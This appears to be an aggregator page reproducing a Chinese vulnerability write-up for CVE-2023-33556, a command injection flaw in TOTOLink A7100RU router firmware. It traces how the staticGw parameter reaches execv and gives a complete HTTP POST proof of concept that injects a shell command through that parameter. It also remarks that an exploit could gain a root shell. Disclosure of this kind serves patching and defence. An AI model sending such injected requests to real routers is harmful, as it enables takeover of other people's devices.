Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-33556: ttt/37 at main · Am1ngl/ttt

TOTOLink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the staticGw parameter at /setting/setWanIeCfg.

CVE
#vulnerability#web#windows#apple#chrome#webkit

TOTOlink A7100RU(V7.4cu.2313_B20191024)路由器存在命令注入漏洞****写在前面

厂商信息:http://totolink.net/

固件下载地址:http://totolink.net/home/menu/detail/menu_listtpl/download/id/185/ids/36.html

1.影响版本

图1为固件版本信息

2.漏洞细节

程序通过获取staticGw参数中的内容传递给v8,之后将v8带入到Uci_Set_Str_By_Idx函数中

在Uci_Set_Str_By_Idx函数中,程序将a5带入到Uci_Set_Str函数中

在Uci_Set_Str函数中,通过snprintf函数,将a4匹配到的内容格式化进v11,之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中,存在命令注入漏洞

POC

POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.0.1 Content-Length: 79 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Content-Type: application/x-www-form-urencoded; charset=UTF-8 Origin: http://192.168.0.1 Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: SESSION_ID=2:1647872744:2 Connection: close

{"topicurl":"setting/setWanIeCfg", "staticGw":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后,您可以编写exp,这可以实现获得根shell的非常稳定的效果

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907